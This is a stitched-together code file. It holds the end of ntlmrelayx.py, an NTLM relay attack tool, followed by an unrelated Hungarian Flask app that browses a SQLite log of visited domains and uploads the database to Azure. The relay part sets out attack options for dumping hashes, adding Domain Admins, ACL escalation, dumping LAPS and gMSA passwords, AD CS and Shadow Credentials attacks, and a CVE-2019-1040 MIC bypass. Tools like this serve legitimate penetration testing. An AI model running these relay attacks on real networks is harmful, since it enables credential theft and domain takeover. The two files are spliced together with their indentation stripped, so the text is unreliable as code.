c.setWebDAVOptions(options.serve_image)
c.setIsADCSAttack(options.adcs)
c.setADCSOptions(options.template)
c.setIsShadowCredentialsAttack(options.shadow_credentials)
c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type, options.cert_outfile_path)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
elif server is WCFRelayServer:
c.setListeningPort(options.wcf_port)
elif server is RAWRelayServer:
c.setListeningPort(options.raw_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to the specified target(s) or back to the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient or LDAP console instead '
'of executing a command after a successful relay. This console will listen locally on a '
'TCP port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_argument_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS
parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will be returned to clients')
parser.add_argument('--disable-multi', action="store_true", required=False, help='If set, disable multi-host relay')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(default: 0 = unlimited)')
# AD CS options
adcsoptions = parser.add_argument_group("AD CS attack options")
adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`')
# Shadow Credentials attack options
shadowcredentials = parser.add_argument_group("Shadow Credentials attack options")
shadowcredentials.add_argument('--shadow-credentials', action='store_true', required=False,
help='Enable Shadow Credentials relay attack (msDS-KeyCredentialLink manipulation for PKINIT pre-authentication)')
shadowcredentials.add_argument('--shadow-target', action='store', required=False, help='target account (user or computer$) to populate msDS-KeyCredentialLink from')
shadowcredentials.add_argument('--pfx-password', action='store', required=False,
help='password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)')
shadowcredentials.add_argument('--export-type', action='store', required=False, choices=["PEM", "PFX"], type=lambda choice: choice.upper(), default="PFX",
help='choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX)')
shadowcredentials.add_argument('--cert-outfile-path', action='store', required=False, help='filename to store the generated self-signed PEM or PFX certificate and key')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if not options.no_wcf_server:
RELAY_SERVERS.append(WCFRelayServer)
if not options.no_raw_server:
RELAY_SERVERS.append(RAWRelayServer)
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
adatgyujtes.py
|
#!/usr/bin/env python
import datetime
import json
import math
import operator
import optparse
import os
import re
import shutil
import sys
import threading
import time
import webbrowser
from collections import namedtuple, OrderedDict
from functools import wraps
from getpass import getpass
import pdb
# Py3k compat.
if sys.version_info[0] == 3:
binary_types = (bytes, bytearray)
decode_handler = 'backslashreplace'
numeric = (int, float)
unicode_type = str
from io import StringIO
else:
binary_types = (buffer, bytes, bytearray)
decode_handler = 'replace'
numeric = (int, long, float)
unicode_type = unicode
from StringIO import StringIO
try:
from flask import (
Flask, abort, escape, flash, jsonify, make_response, Markup, redirect,
render_template, request, session, url_for, Response)
except ImportError:
raise RuntimeError('Unable to import flask module. Install by running '
'pip install flask')
try:
from pygments import formatters, highlight, lexers
except ImportError:
import warnings
warnings.warn('pygments library not found.', ImportWarning)
syntax_highlight = lambda data: '<pre>%s</pre>' % data
else:
def syntax_highlight(data):
if not data:
return ''
lexer = lexers.get_lexer_by_name('sql')
formatter = formatters.HtmlFormatter(linenos=False)
return highlight(data, lexer, formatter)
try:
from peewee import __version__
peewee_version = tuple([int(p) for p in __version__.split('.')])
except ImportError:
raise RuntimeError('Unable to import peewee module. Install by running '
'pip install peewee')
else:
if peewee_version <= (3, 0, 0):
raise RuntimeError('Peewee >= 3.0.0 is required. Found version %s. '
'Please update by running pip install --update '
'peewee' % __version__)
from peewee import *
from peewee import IndexMetadata
from peewee import sqlite3
from playhouse.dataset import DataSet
from playhouse.migrate import migrate
CUR_DIR = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
MAX_RESULT_SIZE = 1000
ROWS_PER_PAGE = 50
SECRET_KEY = 'sqlite-database-browser-0.1.0'
import config
CONFIG = None
app = Flask(
__name__,
static_folder=os.path.join(CUR_DIR, 'static'),
template_folder=os.path.join(CUR_DIR, 'templates'))
app.config.from_object(__name__)
dataset = None
live_dataset = None
migrator = None
offset = 0
#
# Database metadata objects.
#
TriggerMetadata = namedtuple('TriggerMetadata', ('name', 'sql'))
ViewMetadata = namedtuple('ViewMetadata', ('name', 'sql'))
#
# Database helpers.
#
class SqliteDataSet(DataSet):
@property
def filename(self):
db_file = dataset._database.database
if db_file.startswith('file:'):
db_file = db_file[5:]
return os.path.realpath(db_file.rsplit('?', 1)[0])
@property
def is_readonly(self):
db_file = dataset._database.database
return db_file.endswith('?mode=ro')
@property
def base_name(self):
return os.path.basename(self.filename)
@property
def created(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_ctime)
@property
def modified(self):
stat = os.stat(self.filename)
return datetime.datetime.fromtimestamp(stat.st_mtime)
@property
def size_on_disk(self):
stat = os.stat(self.filename)
return stat.st_size
def get_indexes(self, table):
return dataset._database.get_indexes(table)
def get_all_indexes(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('index',))
return [IndexMetadata(row[0], row[1], None, None, None)
for row in cursor.fetchall()]
def get_columns(self, table):
return dataset._database.get_columns(table)
def get_foreign_keys(self, table):
return dataset._database.get_foreign_keys(table)
def get_triggers(self, table):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? AND tbl_name = ?',
('trigger', table))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_triggers(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('trigger',))
return [TriggerMetadata(*row) for row in cursor.fetchall()]
def get_all_views(self):
cursor = self.query(
'SELECT name, sql FROM sqlite_master '
'WHERE type = ? ORDER BY name',
('view',))
return [ViewMetadata(*row) for row in cursor.fetchall()]
def get_virtual_tables(self):
cursor = self.query(
'SELECT name FROM sqlite_master '
'WHERE type = ? AND sql LIKE ? '
'ORDER BY name',
('table', 'CREATE VIRTUAL TABLE%'))
return set([row[0] for row in cursor.fetchall()])
def get_corollary_virtual_tables(self):
virtual_tables = self.get_virtual_tables()
suffixes = ['content', 'docsize', 'segdir', 'segments', 'stat']
return set(
'%s_%s' % (virtual_table, suffix) for suffix in suffixes
for virtual_table in virtual_tables)
#
# Flask views.
#
@app.route('/')
def index():
return render_template('index.html', sqlite=sqlite3)
@app.route('/thanks/')
def thanks():
return render_template('thanks.html')
@app.route('/faq/')
def faq():
return render_template('faq.html')
import nacl.pwhash
import nacl.hash
import nacl.utils
import nacl.exceptions
@app.route('/login/', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
try:
nacl.pwhash.verify(CONFIG.password, request.form.get('password').encode())
session['authorized'] = True
return redirect(session.get('next_url') or url_for('index'))
except nacl.exceptions.InvalidkeyError:
flash('A megadott jelszó helytelen.', 'danger')
return render_template('login.html')
@app.route('/changepw/', methods=['GET', 'POST'])
def changepw():
if request.method == 'POST':
try:
nacl.pwhash.verify(CONFIG.password, request.form.get('oldpassword').encode())
if request.form.get('newpassword') != request.form.get('newpasswordc'):
    flash('A megadott jelszavak nem egyeznek!', 'danger')
elif len(request.form.get('newpassword')) > 16 or len(request.form.get('newpassword')) < 4:
    flash('A jelszó 4-16 karakter hosszúságú kell hogy legyen.', 'danger')
else:
    CONFIG.change_password(request.form.get('newpassword'))
    flash('A jelszó sikeresen megváltoztatásra került!', 'success')
except nacl.exceptions.InvalidkeyError:
flash('A megadott jelszó helytelen.', 'danger')
return render_template('changepw.html')
@app.route('/logout/', methods=['GET'])
def logout():
session.pop('authorized', None)
return redirect(url_for('login'))
def require_table(fn):
@wraps(fn)
def inner(table, *args, **kwargs):
if table not in dataset.tables:
abort(404)
return fn(table, *args, **kwargs)
return inner
def get_request_data():
if request.method == 'POST':
return request.form
return request.args
@app.route('/stop_collecting/')
def stop_collecting():
return render_template('stop_collecting.html')
@app.route('/copy/')
def create_copy_queries():
global dataset
global migrator
shutil.copy(CONFIG.database_path, CONFIG.copied_database_path)
dataset = SqliteDataSet('sqlite:///{path}'.format(path=CONFIG.copied_database_path), bare_fields=True)
migrator = dataset._migrator
return redirect(url_for('table_domains'), code=302)
import procbridge
@app.route('/domains/')
def table_domains():
table = "queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
rows_per_page = app.config['ROWS_PER_PAGE']
dom_field = None
if ('domain' in ds_table.model_class._meta.fields):
dom_field = ds_table.model_class._meta.fields['domain']
delete_domain = request.args.get('delete')
if delete_domain:
ds_table.delete(domain=delete_domain)
#open_live_dataset_table(table).delete(domain=delete_domain)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_domain', {'domain': delete_domain})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra!')
search = request.args.get('search')
if search:
query = ds_table.model_class.select(dom_field, fn.COUNT(dom_field).alias('ct')).group_by(dom_field).where(dom_field.contains(search)).order_by(fn.COUNT(dom_field).desc())
else:
query = ds_table.model_class.select(dom_field, fn.COUNT(dom_field).alias('ct')).group_by(dom_field).order_by(fn.COUNT(dom_field).desc())
#pdb.set_trace()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_domains.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=None)
import azure.storage.blob as blob
import azure.storage.common as common
@app.route('/upload/')
def upload_page():
return render_template(
"upload.html",
upload_path="example.path")
import threading
import requests
import queue
import encryption
import zipfile
import random
from event import QueueEvent
progress_queue = queue.Queue()
global_lock = threading.Lock()
def queue_event_data(data):
"""Queue an SSE with dictionary data"""
print("Queuing {}".format(data), file=sys.stderr)
progress_queue.put(QueueEvent(json.dumps(data)))
time.sleep(0)
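# QueueEvent comes from the local `event` module, which is not shown in this
# file. Judging from how upload_event_stream() consumes it below, a minimal
# sketch of the assumed interface would be:
#
#     class QueueEvent:
#         def __init__(self, data):
#             self._data = data
#         def message(self):
#             # server-sent-events wire format
#             return "data: {}\n\n".format(self._data)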
def progress_callback(current, total):
"""Put the Azure upload progress into the inter-thread queue"""
print("Progress callback.", file=sys.stderr)
queue_event_data({
"type": "upload_progress",
"progress_data": {
"current": current,
"total": total,
"finished": total <= current
}
})
def get_azure_credentials():
"""Get the Azure credentials for the storage account"""
# Get the credentials from the Azure API endpoint
credentials = requests.post(url=CONFIG.sas_url, json={"id": CONFIG.adatgyujtes_id}).json()
# In case of a server error the API responds with a JSON with an error field in it
if "error" in credentials:
raise Exception("Nem tudtuk hitelesíteni az eszközt: " + credentials["error"])
return credentials
def zip_database():
"""Zip up the database"""
with zipfile.ZipFile(CONFIG.zipped_db_name, 'w', zipfile.ZIP_DEFLATED) as dbzip:
dbzip.write(CONFIG.database_path)
def init_key_resolver(credentials):
"""Load the key resolver from the received credentials"""
# The encode method must be called on the key, since it is a string and we need bytes here
key = credentials["rsaPublicKey"].replace(r'\n','\n').encode()
print("KEY is: ", key)
kek = encryption.PublicRSAKeyWrapper(public_key=key)
key_resolver = encryption.KeyResolver()
key_resolver.put_key(key=kek)
return kek, key_resolver.resolve_key
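# The local `encryption` module is not shown here. For client-side encryption
# the Azure storage SDK expects the key-encryption-key object to expose
# roughly this interface (an assumption about the wrapper, matching the SDK
# contract):
#   kek.wrap_key(cek)            -> content encryption key wrapped with RSA
#   kek.get_key_wrap_algorithm() -> e.g. 'RSA-OAEP'
#   kek.get_kid()                -> key id that resolve_key() maps back to kek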
def init_blob_service(credentials):
# Initialize the blob service from the Azure SDK
blobService = blob.BlockBlobService(account_name=credentials["accountName"], account_key=None, sas_token=credentials["sasToken"])
# Load the public key for the encryption. The key resolver object implements a specific interface defined by the Azure SDK
# This would be an unnecessary overhead since we only have the one public key, but there's no way around it
blobService.key_encryption_key, blobService.key_resolver_function = init_key_resolver(credentials=credentials)
# Change the upload parameters, so that the progress callback gets called more frequently, this might also raise the robustness of the upload
blobService.MAX_SINGLE_PUT_SIZE = 4*1024*1024
blobService.MAX_BLOCK_SIZE = 4*1024*1024
return blobService
def upload_task():
"""Start the database upload."""
try:
# Acquire global lock.
if not global_lock.acquire(False):
raise AssertionError("Couldn't acquire global lock.")
# Zip database
print("Zipping database...", file=sys.stderr)
queue_event_data({
"type": "started",
"subject": "compress"
})
zip_database()
queue_event_data({
"type": "completed",
"subject": "compress"
})
# Get Azure credentials
print("Getting credentials...", file=sys.stderr)
queue_event_data({
"type": "started",
"subject": "authenticate"
})
credentials = get_azure_credentials()
if all(s in credentials for s in ('accountName', 'sasToken', 'containerName', 'id', 'rsaPublicKey')):
# Initialize the Azure blob service
print("Initializing Azure blob service...", file=sys.stderr)
blobService = init_blob_service(credentials=credentials)
queue_event_data({
"type": "completed",
"subject": "authenticate"
})
queue_event_data({
"type": "started",
"subject": "upload"
})
# Create the blob
blobService.create_blob_from_path(
container_name=credentials["containerName"],
blob_name=nacl.hash.sha256(nacl.utils.random(64)).decode()[:24],
file_path=CONFIG.zipped_db_name,
progress_callback=progress_callback,
timeout=200)
queue_event_data({
"type": "completed",
"subject": "upload"
})
delete_file(CONFIG.zipped_db_name)
else:
raise AssertionError("Incorrect Azure credentials received.")
# Release global lock
global_lock.release()
print("Upload finished.", file=sys.stderr)
except Exception as e:
print(e, file=sys.stderr)
queue_event_data({
"type": "error",
"message": str(e)
})
finally:
# We absolutely have to release the lock, even if an error occurs
if global_lock.locked():
global_lock.release()
def start_upload():
"""Upload the database to an Azure blob container."""
# Lock object so a duplicate upload can't be started
global global_lock
try:
# Check if the lock is open
if global_lock.locked():
raise AssertionError("Global lock is locked. Upload probably already underway.")
# Start the upload in a separate thread
print("Starting upload thread...", file=sys.stderr)
threading.Thread(target=upload_task).start()
except AssertionError as ae:
print(ae, file=sys.stderr)
raise ae
@app.route('/upload_database/')
def upload_database():
"""Simple endpoint that starts the upload in a separate thread."""
try:
print("Trying to start upload thread...", file=sys.stderr)
start_upload()
# If the upload started successfully, notify the client about it
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
except Exception as ex:
print(ex, file=sys.stderr)
return json.dumps({'success':False, 'error_message': str(ex)}), 409, {'ContentType':'application/json'}
@app.route('/upload_progress/')
def upload_progress():
"""Keep the client up to date about the progress of the upload."""
try:
def upload_event_stream():
"""Async event stream callback."""
try:
stream_active = True
while stream_active:
print("Event stream callback.", file=sys.stderr)
# Get upload progress from inter-thread queue
progress_data = progress_queue.get(block=True, timeout=30)
print("Yielding: {}".format(progress_data.message()), file=sys.stderr)
# Send the progress to the client
yield progress_data.message()
if ("error" in progress_data.message() or '"type": "completed", "subject": "upload"' in progress_data.message()):
stream_active = False
except Exception as ex:
print("Event stream encountered an error." + str(ex), file=sys.stderr)
stream_active = False
return Response(upload_event_stream(), mimetype='text/event-stream')
except Exception as ex:
print(ex, file=sys.stderr)
return str(ex), 500, {'ContentType':'application/json'}
@app.route('/timezone/')
def timezone_information():
global offset
offset = request.args.get('offset') or 0
offset = int(offset)
print("Offset is: ", offset)
# If the upload started successfully, notify the client about it
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
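# Note: `offset` is assumed to hold JavaScript's Date.getTimezoneOffset()
# value in minutes (positive west of UTC); value_filter() below subtracts
# offset * 60 seconds from each stored timestamp to render local time.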
def open_live_dataset_table(table):
# Opening live dataset for delete to remain persistent
live_dataset.connect()
live_dataset.update_cache(table)
return live_dataset[table]
@app.route('/queries/')
def table_queries():
table="queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
rows_per_page = app.config['ROWS_PER_PAGE']
delete_index = request.args.get('delete')
if delete_index:
ds_table.delete(id=delete_index)
#open_live_dataset_table(table).delete(id=delete_index)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_id', {'id': int(delete_index)})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra!')
search = request.args.get('search')
if search:
query = ds_table.model_class.select().where(ds_table.model_class._meta.fields['domain'].contains(search))
else:
query = ds_table.all()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_queries.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=True)
@app.route('/full/')
def table_full():
live_dataset.connect()
dataset = live_dataset # Doesn't override the global instance; this name is local to the view.
table = "queries"
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
raw_data = request.args.get('raw_data') == "True"
rows_per_page = app.config['ROWS_PER_PAGE']
search = request.args.get('search')
if search:
query = ds_table.model_class.select().where(ds_table.model_class._meta.fields['domain'].contains(search))
else:
query = ds_table.all()
total_rows = query.count()
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
delete_index = request.args.get('delete')
if delete_index:
#ds_table.delete(id=delete_index)
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('delete_id', {'id': int(delete_index)})
if response != 'OK':
flash('Nem sikerült végrehajtani a törlés utasítást. Kérjük próbálja meg újra! \nA hiba: ' + str(response))
query = query.paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_queries_full.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
total_pages=total_pages,
total_rows=total_rows,
search=search,
true_content=True,
raw_data=raw_data)
def delete_file(path):
if os.path.exists(path):
print('Deleting {}...'.format(path))
if not dataset._database.is_closed():
dataset.close()
if not live_dataset._database.is_closed():
live_dataset.close()
os.unlink(path)
# TODO: remove the empty file too?
# TODO: test on Linux; on Windows a file cannot be deleted while another process has it open
#shutil.rmtree(path)
else:
print("The file does not exist at location: ", path)
@app.route('/delete_databases/')
def delete_databases():
client = procbridge.Client('127.0.0.1', CONFIG.proc_port)
response = client.request('db_shutdown', {'id': '1234'})
print("RESPONSE IS: ", response)
directory = os.path.dirname(CONFIG.database_path)
random_key_file_name = "random.json"
random_key_file_path = os.path.join(directory, random_key_file_name)
config = "config.ini"
CONFIG.completed = True
for item in [config, CONFIG.copied_database_path, random_key_file_path]:
try:
delete_file(item)
except Exception as e:
result = "Hiba a fájl törlése közben. \nA file: " + item + " \nA hiba: " + str(e)
print(result)
return result
return redirect(url_for('thanks'), code=302)
